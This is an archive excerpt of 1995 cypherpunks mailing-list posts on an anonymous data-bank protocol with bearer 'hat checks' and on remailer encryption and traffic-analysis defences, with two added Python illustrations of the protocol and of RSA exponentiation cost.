 
 
"PGP?"                        "ITAR!"                          "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyu1SHmgMs8UcStNAQGXjQgAmr0PN2RbLwM4IN15YdQhwD/IvYFylTCS
naRCyvqjgzdsPROZAhZKP5eoVbMn6xWmwRhxfplGTCKf3YMRu9FSQHEc7ekL7QQw
mxRvGC2WOMkMuIRXt0DKu6keof9XwWUL2voni+eKme50sppf0ETmLu1outjcCyR6
bJD0XyUxbBPUKpP4prQSc/kT7XVt+wGJVRZtkN1F+43roLRLZYzzjItuR4gqUQ8D
WpC8CDfQTCLb0GDKNC+ZirNdSKGg2t3XnHC2gQpXRLRykPlYG9SpBDm+VuIXV0vl
dALZLV9UtNyulmOYqqkCqBmAavDQDuTjbRnELLsELLSSZrOIiKQ+Sw==
=CaQ6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sun, 29 Jan 95 09:10:23 PST
To: cypherpunks@toad.com
Subject: Data Bank
In-Reply-To: <ab5087cb03021004c425@DialupEudora>
Message-ID: <199501291709.JAA29626@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: norm@netcom.com (Norman Hardy)

   The hat check specifies the secure hash of the data, the
   penalty to be paid upon failure to produce the data, and the cost of
   redeeming the data. 

This sentence contains the single best idea in the whole proposal,
which is to specify liquidated damages in the retrieval note.  (Most
of you will be saying, What?)

One of the largest costs of any conflict resolution is deciding, once
the existence of damage has been agreed upon, exactly what the scope
and worth of that damage was.  "Liquidated damages" are a term of art
referring to a pre-agreed upon worth of the damage in question.  One
most often sees them in construction contracts, where the contractor
will agree to pay a fixed amount per day for each day late.  Rather
than bickering over how much a delay is worth, the two parties agree
in advance to value each day of delay at a given amount.  This kind of
agreement is cheaper _for both parties_ than going to court.

In the data bank case, the liquidated damages are the amount to be
paid upon failure to produce data.  In this case, there's no need even
to call it a penalty.  The data bank agrees to produce either data or
a fixed amount of money.  They get to choose, and it will almost
always be cheaper to remit data rather than money.

   The hat check is signed blindly by the bank and is a
   bearer instrument. 

There's no need to have it signed blind.  A blind signature is useful
when two parties have some persistent relationship with the
intermediary; when they don't have identity, there's no need for
blinding.  Take, for example, a money bank.  Two account holders who
wish to transact also wish to keep that transaction secret; in order
to do so, they use a blind-signed note, which prevents the linkage
from being determined by the bank.  The reason that the blind
signature is necessary is that the two parties have accounts with the
bank, that is, they are known to it in advance.  These two wish not to
create more information at the bank, that is, more information than is
already known.

On the other hand, this model of a data bank does not have account
holders.  The relationship between this data bank and its customers is
embodied in the retrieval notes ("hat checks").  Furthermore, if two
parties wish to move data through the data bank, the storage and the
retrieval transactions can be trivially linked because they are about
the _same_ piece of data.  The hash of the stored data is the same as
the hash of the retrieved data.  Because data is not fungible -- one
block of data is not like another -- the parties who use this data
bank as an intermediary of transmission must remain anonymous to the
data bank if they are to remain unlinked.

A blind signature will not alleviate the need to remain anonymous to
this data bank.  Suppose (somehow) the data bank was able to sign
blind the right sort of retrieval note.  So fine, the retrieval note
doesn't reveal the linkage directly.  But the retrieval note must
contain the hash of the data being retrieved.  The hash can't change;
it's the access key.  So the unchanging part of the note is what gives
the link away.  We therefore conclude that there's no need for a blind
signature here at all.

   Cancel a hat check: A holder of a hat check may sell it back to the bank at
   a negotiated price thus releasing the bank from the threat of paying a
   penalty in the future.

This cancellation can't be done well.  Remember that the parties are
remaining anonymous to the data bank.  In order to release the data
bank of an obligation, some party would have to make some signed
statement releasing the data bank from the obligation.  But making a
signature reveals identity, perforce.

Furthermore the retrieval note is a bearer instrument, but it's a
_digital_ bearer instrument, which means you can't simply give the
note back to the data bank.  There's no piece of paper to return.
Once the note is out there, it's out there forever.  There can be lots
and lots of bearers.  Which one of them gets to release the data bank
of its obligation?

   The hat check may specify expiration dates, cancellation terms etc. 

The retrieval note very well should specify an expiration date, since
otherwise the data bank has specified an obligation in perpetuity.  A
perpetual obligation is much less stable than a fixed-time one.  The
value to the data bank of disappearance grows larger as the cost of
storing the data increases.  No new external revenue is coming in (by
definition -- otherwise you've got a renewable agreement, which is
different) and all you've got is costs.  So there becomes little
reason not to simply abscond with the assets and deny any outstanding
obligations.

A customer, therefore, would be wise not to deal with a data bank
which signed perpetual obligations.  If a customer wants indefinitely
long storage, the best way to do this is with a set of interlocking
obligations with mutually ignorant parties.

   The bank is explicitly permitted to disseminate the data and may
   well do so to lay-off risks. In this sense a data bank is like an
   insurance company that spreads and shares risks. A hat check may be
   viewed as a life insurance policy for the data.

This is exactly why liquidated damages are such a good idea.  By
making explicit the cost of data loss, a data bank can much more
accurately calculate its risks and costs.  Indeed, the ability to lay
off risk of loss is what can create a stable economy of data storage.

There are lots of extraneous elements in the proposal that I've not
addressed.  I wish to highlight what is valuable and not to dwell on
what is not.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 29 Jan 95 09:15:38 PST
To: cypherpunks@toad.com
Subject: Re: Protocols for a Data Bank
Message-ID: <ab517999010210042be5@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


This is a corrected version. I was wrong to suggest that the protocol was
similar to blinded signatures.


Protocols for a Data Bank

The purpose of a data bank is to store large bodies of information for long
periods of time. I suggest here some protocols and contracts for a data
bank and its customers. We then discuss risks, incentives and
stratification of the data storage industry.

Here are several transactions that a data bank engages in.

Acquire data: A client anonymously sends a collection of data along with
funds sufficient to warrant the bank's computing its secure hash and
holding the data for a few days. The bank knows the data only by its secure
hash.

Selling (Hat) Checks: The bank will sell a check to anyone who will pay a
negotiated price. The check specifies the secure hash of the data, the cost
of redeeming the data, and the penalty to be paid by the bank upon failure
to produce the data. A client proposes the details of a check as
follows: Send (SH(acquisition), redemption price, penalty, SH(Secret)) to
the bank along with a proposed price. 'Secret' is a secret random number
chosen by the client for this negotiation. If the bank agrees it signs and
trades the signed message for the proposed price, or it may propose another
price. The signed message is the check and is a bearer instrument.

Redeem data: Any holder of a check can present the check along with the
secret, the redemption fee and demand the data. The data bank must then
either produce the data or pay the penalty to the holder of the check. A
particular check is canceled whenever the bank pays the penalty like a
spent Chaum DigiCash note. The bank can sell multiple checks for the same
data. Different checks for the same data may specify different penalties.

Sell a copy of an acquisition: Anyone can request a piece of data
identified only by its secure hash. The bank is free to sell a copy of the
data to anyone with the secure hash. The bank sets the price.

Publish index: The bank can publish its list of hashes. (This makes data
hunters possible.)

Cancel a check: A holder of a check may sell it back to the bank at a
negotiated price thus releasing the bank from the risk of paying a penalty
in the future. This also allows the bank to retrieve the physical storage
where the data is stored if it is sure that it has not sold other checks
for the data.

Checks may specify expiration dates, cancellation terms etc. The bank is
explicitly permitted to disseminate the data and may well do so to lay-off
and reduce risks. In this sense a data bank is like an insurance company
that spreads and shares risks. A check may be viewed as a life insurance
policy for the data.

Risks

Trust may be divided by agreeing on a notary. Upon redemption the bank
examines the check to see if it has been canceled. If it knows the Secret
which produced the SH(Secret) of the check, the check is canceled.
Otherwise a mutually trusted notary takes the check, accepts the redemption
payment specified therein from the client, passes over the data on its way
from the bank to the client while computing the secure hash. If the secure
hash matches that in the check the notary delivers the payment to the bank.
If the hash fails to match, the transaction is aborted and a penalty
transaction begins. The bank delivers the penalty to the notary and the
client delivers the secret to the notary. If the hash of the secret matches
that in the check then the notary delivers the secret to the bank
(canceling the check) and the penalty amount to the client. The notary need
not have long term financial stability as must the bank.

Brokers may have an interface similar to a bank. They return baskets of
checks. This reduces the risk to the client that one of the data banks will
fail financially and be unable to pay the penalty. The broker need not be
financially stable.

Data Hunters engage in knowing who has what data. Given a hash they can
tell you what banks have the data. This might be the ultimate URL or URI
server.

Inflation can damage incentives. Checks might be denominated in gold or
currency baskets or whatever.

RSA modulus size is critical for long term contacts. 2K bits of modulus or
more may be warranted.

Example

I can imagine the Getty Museum digitizing its Rembrandts and storing the
results in a data bank. The data might be insured for $10,000,000. The bank
would disseminate the data to increase security and lower its risk. The
museum would probably encrypt the data and share the key and hash ala
Shamir for safe keeping. The museum would not share the check because it
wants to be the one paid upon default.

Incentives

A data bank, or any other player, may find keeping data profitable
beyond the point of any outstanding checks. It can make money by selling
copies of the data. Data banks thus have an incentive to disseminate their
list of holdings in the form of hashes, to support data hunters.

Design Considerations

It may seem strange that the data bank is willing to sell data to whoever
will pay. I suggest this because it is easy to encipher the data and
not have to trust the bank. You can distribute the key thru whatever
channels you transmit the secure hash of the data.

Note that bank clients are always anonymous. Data is never held for some
known person. Data may be held solely for speculation. The purpose of the
penalty is to motivate the bank to keep data for which there is no reason
to forecast sales revenue. Unlike Chaum bank notes, the issuance of a hat
check may be associated with the redemption. The depositing of data and
hat check issuance, however, may be anonymous. Data redemption may be
anonymous but collecting a substantial penalty may be difficult to arrange
anonymously. Managing anonymous transactions is a difficult but orthogonal
issue.

The Bank's State

Logically the bank can perform all of these transactions by merely keeping
the unordered set of acquisitions. It is practically necessary to index
these by their secure hash but this can be rebuilt from the acquisitions
themselves. When it loses data it must keep canceled checks to avoid extra
penalties. The bank need not keep records of checks that it has sold unless
it wants to know when it can delete acquisitions. It may want to keep
marketing information to know when acquisitions are worth keeping merely to
sell copies of. The bank will need to keep records of the checks that it
issues for financial auditors (to satisfy owners of the bank.)
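
The check, redemption and penalty transactions described in this post, including the notary's role from the "Risks" section, as an added example (not part of the original post). Assumptions: SHA-256 stands in for SH, an HMAC under a bank-held key stands in for the bank's signature (so only the bank can verify it here), amounts are plain integers, and all class and function names are illustrative.

```python
import hashlib
import hmac
import json
import secrets
from dataclasses import dataclass
from typing import Optional


def SH(data: bytes) -> str:
    """Secure hash. SHA-256 is an assumption; the post names no algorithm."""
    return hashlib.sha256(data).hexdigest()


class DataBank:
    def __init__(self):
        self._key = secrets.token_bytes(32)  # HMAC key standing in for a signing key
        self.store = {}              # SH(data) -> data: data is known only by hash
        self.known_secrets = set()   # SH(Secret) of every Secret the bank has learned

    def acquire(self, data: bytes) -> str:
        digest = SH(data)
        self.store[digest] = data
        return digest

    def _sign(self, body: dict) -> str:
        msg = json.dumps(body, sort_keys=True).encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def sell_check(self, data_hash, redemption_price, penalty, secret_hash) -> dict:
        """Sign the client's proposal (SH(acquisition), price, penalty, SH(Secret))."""
        body = {"data_hash": data_hash, "redemption_price": redemption_price,
                "penalty": penalty, "secret_hash": secret_hash}
        return {**body, "sig": self._sign(body)}

    def is_valid(self, check: dict) -> bool:
        body = {k: v for k, v in check.items() if k != "sig"}
        return hmac.compare_digest(str(check.get("sig", "")), self._sign(body))

    def is_cancelled(self, check: dict) -> bool:
        # A check is cancelled once the bank knows the Secret behind SH(Secret).
        return check["secret_hash"] in self.known_secrets

    def produce(self, data_hash: str) -> Optional[bytes]:
        return self.store.get(data_hash)

    def learn_secret(self, secret: bytes) -> None:
        self.known_secrets.add(SH(secret))


@dataclass
class Outcome:
    result: str                    # "data", "penalty" or "rejected"
    data: Optional[bytes] = None
    paid_to_bank: int = 0
    paid_to_client: int = 0


def notarised_redeem(bank, check, payment, client_secret) -> Outcome:
    """The notary's role from the 'Risks' section of the post."""
    if not bank.is_valid(check) or bank.is_cancelled(check):
        return Outcome("rejected")
    if payment != check["redemption_price"]:
        return Outcome("rejected")
    data = bank.produce(check["data_hash"])
    # The notary hashes the data on its way from the bank to the client.
    if data is not None and SH(data) == check["data_hash"]:
        return Outcome("data", data=data, paid_to_bank=payment)
    # Hash mismatch: abort (payment stays with the client) and start the
    # penalty transaction. The client must now reveal the Secret.
    if SH(client_secret) != check["secret_hash"]:
        return Outcome("rejected")
    bank.learn_secret(client_secret)          # this cancels the check
    return Outcome("penalty", paid_to_client=check["penalty"])


def demo():
    bank = DataBank()
    scan = b"constructed sample: digitized painting bytes"
    digest = bank.acquire(scan)
    s1, s2 = secrets.token_bytes(16), secrets.token_bytes(16)
    check1 = bank.sell_check(digest, 5, 1000, SH(s1))
    check2 = bank.sell_check(digest, 5, 250, SH(s2))   # same data, other penalty
    forged = {**check1, "penalty": 10**7}              # altered after signing
    results = [notarised_redeem(bank, forged, 5, s1)]  # bad signature
    results.append(notarised_redeem(bank, check1, 5, s1))   # data intact
    bank.store[digest] = b"bit rot"                    # simulate the bank losing the data
    results.append(notarised_redeem(bank, check1, 5, s1))   # penalty, check1 cancelled
    results.append(notarised_redeem(bank, check1, 5, s1))   # replay is refused
    results.append(notarised_redeem(bank, check2, 5, s2))   # check2 still pays out
    return results


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```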






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 29 Jan 95 10:22:04 PST
To: cypherpunks@toad.com
Subject: Re: Data Bank
Message-ID: <ab51855603021004ede6@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


My second posting crossed in the mail with Eric's notes.

At 9:09 AM 1/29/95, Eric Hughes wrote:
>   From: norm@netcom.com (Norman Hardy)
....
>
>   The hat check is signed blindly by the bank and is a
>   bearer instrument.
>
>There's no need to have it signed blind.  A blind signature is useful
>when two parties have some persistent relationship with the
>intermediary; when they don't have identity, there's no need for
>blinding.
....
> We therefore conclude that there's no need for a blind
>signature here at all.

Yes, I was confused.  jpp@markv.com had yet other valid objections.
....
>   Cancel a hat check: A holder of a hat check may sell it back to the bank at
>   a negotiated price thus releasing the bank from the threat of paying a
>   penalty in the future.
>
>This cancellation can't be done well.  Remember that the parties are
>remaining anonymous to the data bank.  In order to release the data
>bank of an obligation, some party would have to make some signed
>statement releasing the data bank from the obligation.  But making a
>signature reveals identity, perforce.

I have a novel sense of cancelation in mind. The check is canceled by the
mere fact that the bank knows the Secret that produced the SH(Secret) in
the check. The bank need not acquire or maintain a signed check revocation.
This is sort of like Chaum's spent bills. This requires the client to trust
the bank during the penalty transaction or to require escrow service. I
have modified the original to describe this better.

>
>Furthermore the retrieval note is a bearer instrument, but it's a
>_digital_ bearer instrument, which means you can't simply give the
>note back to the data bank.  There's no piece of paper to return.
>Once the note is out there, it's out there forever.  There can be lots
>and lots of bearers.  Which one of them gets to release the data bank
>of its obligation?
....
Any bearer. Just as any bearer of a Chaum bill can spend it. Only he who
spends it first, can spend it. Disseminate your hat checks carefully. That
is another reason that Getty, in the example, holds the hat check
carefully.
....
>   The hat check may specify expiration dates, cancellation terms etc.
>
>The retrieval note very well should specify an expiration date, since
>otherwise the data bank has specified an obligation in perpetuity.  A
>perpetual obligation is much less stable than a fixed-time one.  The
>value to the data bank of disappearance grows larger as the cost of
>storing the data increases.  No new external revenue is coming in (by
>definition -- otherwise you've got a renewable agreement, which is
>different) and all you've got is costs.  So there becomes little
>reason not to simply abscond with the assets and deny any outstanding
>obligations.
>
>A customer, therefore, would be wise not to deal with a data bank
>which signed perpetual obligations.  If a customer wants indefinitely
>long storage, the best way to do this is with a set of interlocking
>obligations with mutually ignorant parties.
....
Good points. I anticipate more complex broker services here.

I like the idea of a penalty for delay in retrieving the data aside from
penalty for losing the data. This may be strategic in the bank's arranging
for the storage and retrieval from other sites and banks.

Thanks. I will try to produce an emended version thru ftp soon.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random walk <pfinerty@seattleu.edu>
Date: Sun, 29 Jan 95 12:47:48 PST
To: Todd Masco <cactus@hks.net>
Subject: Re: NNTP archives and internet credit bureau...
In-Reply-To: <199501290425.XAA25516@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950129124315.17273B-100000@bach.seattleu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

i was able to get to hks.lists.cypherpunks group quite easily using NCSA 
Mosaic.  i set my news server to nntp.hks.net and then told Mosaic to go 
to a URL with this format, 

news:hks.lists.cypherpunks  

surprisingly, this worked quite well.

- -------------

on another note, i recently checked out the internet credit bureau as 
well and will write about that soon.  very interesting and a little scary 
too.

- -pjf


after removing the brain i simply placed it in a jar on my bench and
connected it to my calculator. it didn't do anything but it looked cool.
pfinerty@bach.seattleu.edu
finerty@msscc.med.utah.edu           finger any acct. for pgp key
pfinerty@nyx10.cs.du.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLyv/BbJv5rDIkn05AQF2bgIAlgtdThjO4Zex67YBw9Ho1lF7t+w7ZCMe
PCufhFzfUpdjbz6/HGvC9RClpqmfkssNw0a++MwszIIBpCT2eAnM/w==
=wry5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 29 Jan 95 13:09:22 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: CERN Web Proxy
Message-ID: <Chameleon.4.01.950129130912.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone post the host/port number of the proxy server at CERN?

Thanks,

Johnathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 29 Jan 95 13:14:56 PST
To: cypherpunks@toad.com
Subject: Re: Secure (?) Remailer-net
Message-ID: <199501292113.NAA06033@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Nathan Zook <nzook@bga.com>
> >>     First, the message is signed with the sender's key.  (More on that
> >> later.)
> >
> >I did not see why this should be done.
> >
> 
> No?  Isn't the InterNet currently under a serious packet-spoofing attack?
> Don't we expect Eve to be AKA NSA?  If I run a remailer, I want to know
> that I'm not being lied to in the process.  That insistence might just save
> the legal butt of the guy being spoofed, by demonstrating that the packet
> did not in fact originate from the remailer.  Just because remailers are
> legal doesn't mean that the govt won't still try to shut them down...

I can see the advantage from the sender's point of view.  If I sign all
messages I send, then I have some defense against the charge that I sent a
particular message, if it doesn't bear my signature.  (OTOH the
prosecutors can argue that I simply skipped signing that one.)  This does of
course expose me to the risk that if I _did_ send a particular message,
my signature will be incriminating.  In any case I am still puzzled by
your statement that you as a remailer operator would want to be able to
verify the source of all incoming messages.  Would you do things
differently with messages from different sources?  I hear you saying
that you care if you get a message claiming to be from Alice but not
bearing a good signature from her.  Why?  Again, what would you do
differently?

> >A better approach IMO is to embed the message length in the encrypted
> >information (as PGP does) and pad with cryptographic random garbage
> >(which PGP could be patched to do).
> >
> 
> In this instance garbage is defined as cryptographic random.  If the
> message has a length indicator in the clear, then Eve can read it.
> (Remember, Eve runs snakoil@nsa.gov.)  Therefore, such a marker has to be
> _inside_ the wrapper.  Given this, (that everything is PGP wrapped) there
> is always the chance that PGP will compress a message, even one with
> cryptographically strong bits in the end.  While compression can improve
> protection, it is not likely to do so if the original message was already
> PGPed.  Only "clear" messages, therefore, risk losing protection.  As you
> note, such messages don't deserve as much help as opaque ones.

PGP already includes a cryptographically protected length field in the
message.  It will ignore any data past that, according to my experiments.
All that is needed is a simple patch to add junk data to the end.

> >>     Note that this system would allow the extropian remailer to be
> >> compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
> >> like separate pgp packets, or packets it can't read, or something.) Under
> >> the current system, the precaution is entirely warranted.
> >
> >I don't think so.  The problem with Miron's extropy remailer is that it
> >only passes through the contents of a PGP block.  For anonymous addresses
> >to work, the (chained,encrypted) address must be in a PGP block which
> >precedes the message body.  I don't see how any cutmarks idea would
> >affect this.
> >
> 
> Sure it does.  If the whole thing is inside a PGP wrapper, then it is
> secure.  "Only passing through the contents of a PGP block" is currently a
> security measure that makes good sense.  But if you have two separate
> blocks _inside_ an outer wrapper, you already have full security.  Strip
> off the outside, find two more wrappers.  Strip the first, get remailing
> instructions.  Attempt to strip the second.  Fail.  Attach second wrapper
> to forwarded message.  Full security.

I still don't quite follow this.  Exactly what attack would be possible
against Miron's remailer if it allowed encrypted reply blocks (as all
others do) which would fail if the messages were wrapped as you suggest?

> Alice signs her messages to the remailer because she doesn't want anyone
> spoofing her use of the remailer.  If a message goes in at 00:00:00.01, 1
> Jan, 2001 that is "From:" her, it is FROM her.  More of the same reasoning.
> This key doesn't have to have anything to do with the key she uses with
> Bob.  It is the one that she wants the general public to use for HER.

Alice may not have a key she wants the general public to use - she may
just be using one for her private correspondents.  Actually it seems to
me given the nature of remailing that it would be superior if it were
easy for people to "spoof" my use of the remailer.  That would give me
more credence to claim innocence.  The more useless return addresses are,
the less we even need remailers.

> Suppose you were using the remailer net.  Would you care to know that
> someone was spoofing a node?  I would.  It would indicate that someone is
> either hacking the system (probably no big deal), or that someone might be
> shadowing a remailer.  That is, the remailer is no longer secure.  Spoofing
> is a big deal on the net generally, and if we start being used a lot, we
> will have to deal with it as well.  Why not now?

It's not my job to fix the damn Internet.  So what if I get mail claiming
to be from abc when it's actually from def?  I of all people care the
least, specifically because I throw away this data.  Virtually everyone
else on the net cares where their mail comes from, but I don't.  My whole
purpose is to discard the information about where it comes from.  That is
why I am so confused about your emphasis on checking signatures.

> Maybe that was too harsh.  I don't advocate holding people's hands.  What I
> _do_ want to do is to provide the best service that we can.  Note that from
> earlier and current work (thanks, guys!), we see that even if the remailer
> net itself is completely secure, the sender and receiver can still be
> traced with near-exponential speed.  

Although I agree with Wei Dai's mathematics, to my mind it points up the
importance of successful countermeasures rather than implying that the
remailer network is inherently insecure.  For example, if you send one
identical message every batch, Wei's math shows clearly that you can't be
traced.  Let's not get rumors started about how the remailers don't
work.

> So our systems provide a delay in tracking of a couple of months.  Big
> deal.  The TLAs routinely take years to build a serious case.  If we are
> going to be any help to folks that _really_ need it, we have to extend the
> black box all the way to people outside the net.  As you said, not everyone
> will be remailers anytime soon.

Do you see your suggestion as protecting against Wei's in/out correlation
attack?  I don't see it.  If fixed-sized packets are used, with chained
encryption, I think you have as good a system as you do with all of your
inter-node encryption and signing.

Suppose one good encrypted message enters the net with 10 unencrypted
ones.  Won't the full path of each of the 10 be visible to an outsider?
Even if the remailer helps out those 10 doltish users by encrypting them
from there on out, the outsider already saw their whole paths!  They will
know how many unencrypted messages are going out to each destination, and
from that determine where the encrypted message is going.

> >Since the secret key d is effectively a random number from 0 to m, you
> >would have to create, say, 1000 key pairs to have a good chance of
> >finding a d that was as much as 10 bits shorter than m.  Then o(d) might
> >be 5 bits shorter.  So you'd be down from 768+384 to 758+379 or about a
> >1% reduction in time.  And it will take a while to generate 1000 keys.
> >To get a 2% reduction you would have to generate 1000000 keys.  I hope
> >you have a lot of time on your hands.
> >
> 
> Actually, I did make this error when I first considered this, also.  We do
> not hope for a short key.  In fact, we know that the key will be long, when
> viewed in parts, as I now believe that it is.  We hope that the key will be
> 0 rich.  The chance of this just comes off of the binomial distribution,
> which is not nearly so bad.  Sorry.  And a, say, 10% improvement above
> expected allows a corresponding length increase--which does something
> _more_ than improve security by 10% ;)

Yes, I see that you are right about this.  It would be easy to generate
e,d pairs and get a d which is significantly short on 1's by 10% or more.
I did not quite follow your algorithm to do this (was n the modulus or
was it phi, the sum of the modulus' divisors?).  The one caveat is that
if "high-zero" decryption exponents are widely used, it could conceivably
reduce the search space somehow, although I don't see offhand how to
exploit this.

Hal
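
The cost model used in the exchange above (one squaring per bit of d plus one multiplication per 1 bit, the "768+384" figure), worked through as an added example that is not part of the original message. It assumes d behaves like 768 uniformly random bits; the function names are hypothetical.

```python
from math import comb


def modexp_count(base: int, exp: int, mod: int):
    """Left-to-right square-and-multiply.

    Returns (result, squarings, multiplications): one squaring per bit of
    exp and one extra multiplication per 1 bit, the model behind "768+384".
    """
    result, squarings, multiplications = 1, 0, 0
    for bit in bin(exp)[2:]:
        result = (result * result) % mod
        squarings += 1
        if bit == "1":
            result = (result * base) % mod
            multiplications += 1
    return result, squarings, multiplications


def cost(bits: int, ones: int) -> int:
    """Modular operations for an exponent with `bits` bits and `ones` 1 bits."""
    return bits + ones


def prob_leading_zeros(zero_bits: int) -> float:
    """Chance that a uniformly random exponent has `zero_bits` leading zeros."""
    return 2.0 ** -zero_bits


def prob_weight_at_most(bits: int, max_ones: int) -> float:
    """Exact binomial tail: chance that `bits` random bits hold <= max_ones 1s."""
    return sum(comb(bits, i) for i in range(max_ones + 1)) / 2 ** bits


def compare(bits: int = 768):
    """Compare the two ways of getting a cheaper d discussed in the thread.

    Returns, for each strategy, (probability that one random d qualifies,
    fractional saving in modular operations against an average d).
    """
    avg_ones = bits // 2
    baseline = cost(bits, avg_ones)                 # 768 + 384
    short = cost(bits - 10, (bits - 10) // 2)       # 758 + 379
    sparse_ones = avg_ones * 9 // 10                # 10% fewer 1 bits than average
    sparse = cost(bits, sparse_ones)
    return {
        "short_d": (prob_leading_zeros(10), 1 - short / baseline),
        "zero_rich_d": (prob_weight_at_most(bits, sparse_ones), 1 - sparse / baseline),
    }


if __name__ == "__main__":
    for name, (prob, saving) in compare().items():
        print(f"{name}: about 1 in {round(1 / prob)} candidates, "
              f"{saving:.1%} fewer modular operations")
```
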




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 29 Jan 95 13:04:12 PST
To: cypherpunks@toad.com
Subject: Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9501291512.A11570-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Lance Cottrell <lcottrell@popmail.ucsd.edu>

>I agree completely that messages should be encrypted between remailers.
>This does raise the issue of keeping a database of all other remailers at
>each remailer. Let's settle for encrypting to the next remailer most of the
>time.

Well, actually, I'm suggesting a database that includes all remailers and
all selected users.  ICT: in order to beat TA, first or last remailers are
going to _have_ to use standardized, encrypted packets.  The remailers
are almost secondary here, except that we aren't sure that TA through the
net is impossible.  Or we could be fascists, and _only_ send out PGP-ed,
standard sized packets.  (Forcing remailer-users to get into PGP.)
Something would have to be done about lists & mail-to-news.

Is there some difficulty in maintaining a database?  Remailers would want
to publicize their existence.  This might involve pinging, but so what?
That's just more noise.

>The best way to do that is to open a socket between the remailers, and use
>DH key exchange (authenticated with RSA?), to generate the encryption key.
>This gives forward security to any intercepted messages. It is high on my
>list of upgrades to Mixmaster.

But doesn't this require a realtime connection to be practical?  ie:
remailers must be _on_ the net?

As far as this all goes, the sender could stick _all_ packets together, PGP
the whole thing, and send _that_.  This would only require signing once per
recipient per tick.  T1, anyone?

***

P.S.  Could you mail me that essay?  I'm long distance to the net right now.

***

Adam Shostack <adam@bwh.harvard.edu>

>Nathan Zook:
>|  
>|     Suppose Alice sends Bob a message e(M) through Chaum.  Eve, a strong
>| opponent, wants to trace the message.  She keeps track of all outgoing mail
>| from Alice, an MD5 hash of all incoming messages to Bob, and outgoing from
>| Bob.  Eve then sends Chaum e(M), and waits for a matching MD5 to Bob that
>| doesn't correlate to an outgoing MD5 from Bob.  (Eve knows that Bob is a
>| remailer.)
>|  
>|     Gentlemen, I believe that I have just stumbled upon a strong proof of
>| the necessity of remailer auto-encryption of all messages.  Since the
>| session key is PRG, MD5 will change (a lot;).  Furthermore, remailer auto-
>| encryption allows the mailers to number their messages to each other.  A
>| low number means a re-transmit from the remailer, which is not possible,
>| unless some sort of ACK system is in place, and even then, would still
>| flag.  Of course, if the remailers _sign_ their messages (on the way out)
>| as well, you could compare the timestamps of the signatures with the
>| message itself.
>
>	This is strong argument for encrypting your chain of messages,
>using premail, or chainmail, or something similar.  Why the remailers
>should do this is not clear at all from your argument.  Remailer
>operators should be discouraged from cooperation beyond that which is
>needed.
>
>Adam

I think that you are missing the attack.  Eve wants to prove that Alice
sent a message to Bob.  By resending Alice's message, it will route through
Chaum just fine, producing identical output (message to Bob) as before.
Assuming that Eve doesn't intercept the message, stopping Bob from getting
it, Bob will know that something is up when he gets the message the second
time, but by then it is too late.  Eve knows that Alice's message, sent at
time X, corresponds to a message received by Bob at time Y.  This is
exactly the sort of thing that LEAs love to use in building a case.

My claim is that the only way to prevent this attack is for Chaum not to
send out identical messages if he receives identical messages.  Identical,
in this case, would include messages identical except for
"cryptographically strong random" data tacked on to the end, because if Eve
had the storage space, she could compare messages _that_ way, stripping off
the end bits, and getting the real message (encrypted) to Bob in the
process.

The natural way to do this is to super-encrypt.  Of course, if Chaum just
sends one rather large file to Bob each tick, Eve is hosed.

BTW, if Chaum does an MD5-compare of all incoming messages, he can limit a
spam to 1 per tick from his remailer with _no_ recordkeeping.  Or maybe he
could send a bunch of identical garbage messages to a random remailer, 85%
of the time....

I really don't see how you can call this "cooperation beyond that which is
needed".  If the remailers default to strip nested envelopes, and to pad
messages to standard sizes, the only "cooperation" between the operators is
to publish PGP keys.  They aren't "helping" each other, they are helping
the end users.

But this is all so trivial, compared to arguing operating systems.

Nathan


Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.

Factors for modulus are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.

Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random walk <pfinerty@seattleu.edu>
Date: Sun, 29 Jan 95 15:08:12 PST
To: Johnathan Corgan <jcorgan@aeinet.com>
Subject: Re: CERN Web Proxy
In-Reply-To: <Chameleon.4.01.950129130912.jcorgan@comet.aeinet.com>
Message-ID: <Pine.SUN.3.91.950129150751.28793B-100000@bach.seattleu.edu>
MIME-Version: 1.0
